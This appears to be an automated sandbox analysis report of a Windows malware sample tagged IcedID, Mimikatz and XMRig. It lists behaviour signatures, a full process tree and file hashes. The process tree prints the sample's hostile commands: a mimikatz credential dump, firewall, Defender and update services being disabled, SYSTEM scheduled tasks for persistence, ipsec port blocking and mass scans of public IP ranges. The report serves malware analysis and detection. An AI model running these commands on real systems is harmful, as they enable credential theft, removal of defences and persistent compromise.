Analysis

  • max time kernel
    150s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-09-2024 15:41

General

  • Target

    2024-09-07_2c5b2ce6cab1fed7b95164237b40e7e1_hacktools_icedid_mimikatz.exe

  • Size

    8.4MB

  • MD5

    2c5b2ce6cab1fed7b95164237b40e7e1

  • SHA1

    e1542dca2218091a8dd7211f772353a0aaf69e20

  • SHA256

    a9450d7d5a883886687aaabe462df3617e216443e1473dc53c03b28e4a71d425

  • SHA512

    4950b0b4c5cee0faa00b28092968e3efaf41550415a609a2445e960bd1485e28f01d56932416f216452ca45c3b8a1b8714095315d0808a6f32061c7abc9bd43a

  • SSDEEP

    98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (19003) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

  • XMRig Miner payload 10 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 5 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Executes dropped EXE 29 IoCs
  • Loads dropped DLL 12 IoCs
  • UPX packed file 36 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Creates a Windows Service
  • Drops file in System32 directory 18 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 3 IoCs
  • Modifies data under HKEY_USERS 47 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 25 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:1680
      • C:\Windows\TEMP\uczqnfqby\ftfrpi.exe
        "C:\Windows\TEMP\uczqnfqby\ftfrpi.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:2952
    • C:\Users\Admin\AppData\Local\Temp\2024-09-07_2c5b2ce6cab1fed7b95164237b40e7e1_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-09-07_2c5b2ce6cab1fed7b95164237b40e7e1_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2020
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\ibcutqwu\gzlqlcb.exe
        2⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:652
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:4424
        • C:\Windows\ibcutqwu\gzlqlcb.exe
          C:\Windows\ibcutqwu\gzlqlcb.exe
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:1272
    • C:\Windows\ibcutqwu\gzlqlcb.exe
      C:\Windows\ibcutqwu\gzlqlcb.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2044
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:368
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
            PID:2656
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D users
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2360
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
              PID:3136
            • C:\Windows\SysWOW64\cacls.exe
              cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
              3⤵
              • System Location Discovery: System Language Discovery
              PID:2556
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
              3⤵
              • System Location Discovery: System Language Discovery
              PID:2180
            • C:\Windows\SysWOW64\cacls.exe
              cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
              3⤵
              • System Location Discovery: System Language Discovery
              PID:4780
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static del all
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:1548
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add policy name=Bastards description=FuckingBastards
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:1964
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add filteraction name=BastardsList action=block
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:820
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c C:\Windows\eqbflpvll\cqzqykzwz\wpcap.exe /S
            2⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1572
            • C:\Windows\eqbflpvll\cqzqykzwz\wpcap.exe
              C:\Windows\eqbflpvll\cqzqykzwz\wpcap.exe /S
              3⤵
              • Drops file in Drivers directory
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in System32 directory
              • Drops file in Program Files directory
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3080
              • C:\Windows\SysWOW64\net.exe
                net stop "Boundary Meter"
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2568
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop "Boundary Meter"
                  5⤵
                    PID:1352
                • C:\Windows\SysWOW64\net.exe
                  net stop "TrueSight Meter"
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:3128
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 stop "TrueSight Meter"
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:4388
                • C:\Windows\SysWOW64\net.exe
                  net stop npf
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:1188
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 stop npf
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:1208
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:4708
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:3448
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c net start npf
              2⤵
              • System Location Discovery: System Language Discovery
              PID:4204
              • C:\Windows\SysWOW64\net.exe
                net start npf
                3⤵
                • System Location Discovery: System Language Discovery
                PID:4824
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 start npf
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:1396
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c net start npf
              2⤵
              • System Location Discovery: System Language Discovery
              PID:5112
              • C:\Windows\SysWOW64\net.exe
                net start npf
                3⤵
                • System Location Discovery: System Language Discovery
                PID:2180
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 start npf
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:4780
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c C:\Windows\eqbflpvll\cqzqykzwz\bqpfqegdw.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\eqbflpvll\cqzqykzwz\Scant.txt
              2⤵
                PID:3936
                • C:\Windows\eqbflpvll\cqzqykzwz\bqpfqegdw.exe
                  C:\Windows\eqbflpvll\cqzqykzwz\bqpfqegdw.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\eqbflpvll\cqzqykzwz\Scant.txt
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  PID:4520
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c C:\Windows\eqbflpvll\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\eqbflpvll\Corporate\log.txt
                2⤵
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                PID:3928
                • C:\Windows\eqbflpvll\Corporate\vfshost.exe
                  C:\Windows\eqbflpvll\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1212
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "sbcsldepb" /ru system /tr "cmd /c C:\Windows\ime\gzlqlcb.exe"
                2⤵
                • System Location Discovery: System Language Discovery
                PID:2804
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:4372
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /sc minute /mo 1 /tn "sbcsldepb" /ru system /tr "cmd /c C:\Windows\ime\gzlqlcb.exe"
                  3⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:2020
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "zsciiyqsz" /ru system /tr "cmd /c echo Y|cacls C:\Windows\ibcutqwu\gzlqlcb.exe /p everyone:F"
                2⤵
                • System Location Discovery: System Language Discovery
                PID:3824
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:4832
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /sc minute /mo 1 /tn "zsciiyqsz" /ru system /tr "cmd /c echo Y|cacls C:\Windows\ibcutqwu\gzlqlcb.exe /p everyone:F"
                  3⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:2648
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "nzctfewsb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\uczqnfqby\ftfrpi.exe /p everyone:F"
                2⤵
                • System Location Discovery: System Language Discovery
                PID:1856
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  3⤵
                    PID:2520
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /sc minute /mo 1 /tn "nzctfewsb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\uczqnfqby\ftfrpi.exe /p everyone:F"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    • Scheduled Task/Job: Scheduled Task
                    PID:3548
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  PID:536
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  PID:3192
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:4928
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static set policy name=Bastards assign=y
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:5116
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:2284
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  PID:1084
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:2840
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static set policy name=Bastards assign=y
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:3216
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:760
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  PID:516
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:3232
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static set policy name=Bastards assign=y
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:2576
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c net stop SharedAccess
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:4088
                  • C:\Windows\SysWOW64\net.exe
                    net stop SharedAccess
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:3068
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 stop SharedAccess
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:1240
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c netsh firewall set opmode mode=disable
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:4580
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh firewall set opmode mode=disable
                    3⤵
                    • Modifies Windows Firewall
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:5104
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c netsh Advfirewall set allprofiles state off
                  2⤵
                    PID:208
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh Advfirewall set allprofiles state off
                      3⤵
                      • Modifies Windows Firewall
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:2384
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net stop MpsSvc
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:2288
                    • C:\Windows\SysWOW64\net.exe
                      net stop MpsSvc
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:844
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 stop MpsSvc
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:1856
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net stop WinDefend
                    2⤵
                      PID:636
                      • C:\Windows\SysWOW64\net.exe
                        net stop WinDefend
                        3⤵
                          PID:4884
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 stop WinDefend
                            4⤵
                            • System Location Discovery: System Language Discovery
                            PID:2520
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c net stop wuauserv
                        2⤵
                          PID:3760
                          • C:\Windows\SysWOW64\net.exe
                            net stop wuauserv
                            3⤵
                              PID:2200
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop wuauserv
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:3872
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c sc config MpsSvc start= disabled
                            2⤵
                              PID:620
                              • C:\Windows\SysWOW64\sc.exe
                                sc config MpsSvc start= disabled
                                3⤵
                                • Launches sc.exe
                                • System Location Discovery: System Language Discovery
                                PID:3116
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c sc config SharedAccess start= disabled
                              2⤵
                              • System Location Discovery: System Language Discovery
                              PID:4760
                              • C:\Windows\SysWOW64\sc.exe
                                sc config SharedAccess start= disabled
                                3⤵
                                • Launches sc.exe
                                • System Location Discovery: System Language Discovery
                                PID:4712
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c sc config WinDefend start= disabled
                              2⤵
                              • System Location Discovery: System Language Discovery
                              PID:3032
                              • C:\Windows\SysWOW64\sc.exe
                                sc config WinDefend start= disabled
                                3⤵
                                • Launches sc.exe
                                • System Location Discovery: System Language Discovery
                                PID:3640
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c sc config wuauserv start= disabled
                              2⤵
                              • System Location Discovery: System Language Discovery
                              PID:2612
                              • C:\Windows\SysWOW64\sc.exe
                                sc config wuauserv start= disabled
                                3⤵
                                • Launches sc.exe
                                • System Location Discovery: System Language Discovery
                                PID:2708
                            • C:\Windows\TEMP\xohudmc.exe
                              C:\Windows\TEMP\xohudmc.exe
                              2⤵
                              • Executes dropped EXE
                              • Drops file in System32 directory
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of SetWindowsHookEx
                              PID:2488
                            • C:\Windows\TEMP\eqbflpvll\bbdqsyfub.exe
                              C:\Windows\TEMP\eqbflpvll\bbdqsyfub.exe -accepteula -mp 788 C:\Windows\TEMP\eqbflpvll\788.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3192
                            • C:\Windows\TEMP\eqbflpvll\bbdqsyfub.exe
                              C:\Windows\TEMP\eqbflpvll\bbdqsyfub.exe -accepteula -mp 64 C:\Windows\TEMP\eqbflpvll\64.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3524
                            • C:\Windows\TEMP\eqbflpvll\bbdqsyfub.exe
                              C:\Windows\TEMP\eqbflpvll\bbdqsyfub.exe -accepteula -mp 1680 C:\Windows\TEMP\eqbflpvll\1680.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3980
                            • C:\Windows\TEMP\eqbflpvll\bbdqsyfub.exe
                              C:\Windows\TEMP\eqbflpvll\bbdqsyfub.exe -accepteula -mp 2512 C:\Windows\TEMP\eqbflpvll\2512.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3216
                            • C:\Windows\TEMP\eqbflpvll\bbdqsyfub.exe
                              C:\Windows\TEMP\eqbflpvll\bbdqsyfub.exe -accepteula -mp 2696 C:\Windows\TEMP\eqbflpvll\2696.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1604
                            • C:\Windows\TEMP\eqbflpvll\bbdqsyfub.exe
                              C:\Windows\TEMP\eqbflpvll\bbdqsyfub.exe -accepteula -mp 2728 C:\Windows\TEMP\eqbflpvll\2728.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2180
                            • C:\Windows\TEMP\eqbflpvll\bbdqsyfub.exe
                              C:\Windows\TEMP\eqbflpvll\bbdqsyfub.exe -accepteula -mp 3092 C:\Windows\TEMP\eqbflpvll\3092.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1652
                            • C:\Windows\TEMP\eqbflpvll\bbdqsyfub.exe
                              C:\Windows\TEMP\eqbflpvll\bbdqsyfub.exe -accepteula -mp 3764 C:\Windows\TEMP\eqbflpvll\3764.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2656
                            • C:\Windows\TEMP\eqbflpvll\bbdqsyfub.exe
                              C:\Windows\TEMP\eqbflpvll\bbdqsyfub.exe -accepteula -mp 3852 C:\Windows\TEMP\eqbflpvll\3852.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4880
                            • C:\Windows\TEMP\eqbflpvll\bbdqsyfub.exe
                              C:\Windows\TEMP\eqbflpvll\bbdqsyfub.exe -accepteula -mp 3920 C:\Windows\TEMP\eqbflpvll\3920.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4512
                            • C:\Windows\TEMP\eqbflpvll\bbdqsyfub.exe
                              C:\Windows\TEMP\eqbflpvll\bbdqsyfub.exe -accepteula -mp 4012 C:\Windows\TEMP\eqbflpvll\4012.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4600
                            • C:\Windows\TEMP\eqbflpvll\bbdqsyfub.exe
                              C:\Windows\TEMP\eqbflpvll\bbdqsyfub.exe -accepteula -mp 1316 C:\Windows\TEMP\eqbflpvll\1316.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1836
                            • C:\Windows\TEMP\eqbflpvll\bbdqsyfub.exe
                              C:\Windows\TEMP\eqbflpvll\bbdqsyfub.exe -accepteula -mp 3996 C:\Windows\TEMP\eqbflpvll\3996.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4592
                            • C:\Windows\TEMP\eqbflpvll\bbdqsyfub.exe
                              C:\Windows\TEMP\eqbflpvll\bbdqsyfub.exe -accepteula -mp 3864 C:\Windows\TEMP\eqbflpvll\3864.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3392
                            • C:\Windows\TEMP\eqbflpvll\bbdqsyfub.exe
                              C:\Windows\TEMP\eqbflpvll\bbdqsyfub.exe -accepteula -mp 1492 C:\Windows\TEMP\eqbflpvll\1492.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1768
                            • C:\Windows\TEMP\eqbflpvll\bbdqsyfub.exe
                              C:\Windows\TEMP\eqbflpvll\bbdqsyfub.exe -accepteula -mp 4020 C:\Windows\TEMP\eqbflpvll\4020.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3220
                            • C:\Windows\TEMP\eqbflpvll\bbdqsyfub.exe
                              C:\Windows\TEMP\eqbflpvll\bbdqsyfub.exe -accepteula -mp 1692 C:\Windows\TEMP\eqbflpvll\1692.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2480
                            • C:\Windows\TEMP\eqbflpvll\bbdqsyfub.exe
                              C:\Windows\TEMP\eqbflpvll\bbdqsyfub.exe -accepteula -mp 4428 C:\Windows\TEMP\eqbflpvll\4428.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:368
                            • C:\Windows\TEMP\eqbflpvll\bbdqsyfub.exe
                              C:\Windows\TEMP\eqbflpvll\bbdqsyfub.exe -accepteula -mp 4548 C:\Windows\TEMP\eqbflpvll\4548.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2764
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c C:\Windows\eqbflpvll\cqzqykzwz\scan.bat
                              2⤵
                              • System Location Discovery: System Language Discovery
                              PID:4352
                              • C:\Windows\eqbflpvll\cqzqykzwz\ynqpazbis.exe
                                ynqpazbis.exe TCP 194.110.0.1 194.110.255.255 7001 512 /save
                                3⤵
                                • Executes dropped EXE
                                • Drops file in Windows directory
                                • System Location Discovery: System Language Discovery
                                PID:4776
                          • C:\Windows\SysWOW64\skaigk.exe
                            C:\Windows\SysWOW64\skaigk.exe
                            1⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of SetWindowsHookEx
                            PID:2856
                          • C:\Windows\system32\cmd.EXE
                            C:\Windows\system32\cmd.EXE /c C:\Windows\ime\gzlqlcb.exe
                            1⤵
                              PID:548
                              • C:\Windows\ime\gzlqlcb.exe
                                C:\Windows\ime\gzlqlcb.exe
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of SetWindowsHookEx
                                PID:1232
                            • C:\Windows\system32\cmd.EXE
                              C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\uczqnfqby\ftfrpi.exe /p everyone:F
                              1⤵
                                PID:4364
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                  2⤵
                                    PID:1904
                                  • C:\Windows\system32\cacls.exe
                                    cacls C:\Windows\TEMP\uczqnfqby\ftfrpi.exe /p everyone:F
                                    2⤵
                                      PID:3980
                                  • C:\Windows\system32\cmd.EXE
                                    C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\ibcutqwu\gzlqlcb.exe /p everyone:F
                                    1⤵
                                      PID:4484
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                        2⤵
                                          PID:3992
                                        • C:\Windows\system32\cacls.exe
                                          cacls C:\Windows\ibcutqwu\gzlqlcb.exe /p everyone:F
                                          2⤵
                                            PID:2932

                                        Network

                                        MITRE ATT&CK Enterprise v15

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads

                                        • C:\Windows\SysWOW64\Packet.dll

                                          Filesize

                                          95KB

                                          MD5

                                          86316be34481c1ed5b792169312673fd

                                          SHA1

                                          6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

                                          SHA256

                                          49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

                                          SHA512

                                          3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

                                        • C:\Windows\SysWOW64\wpcap.dll

                                          Filesize
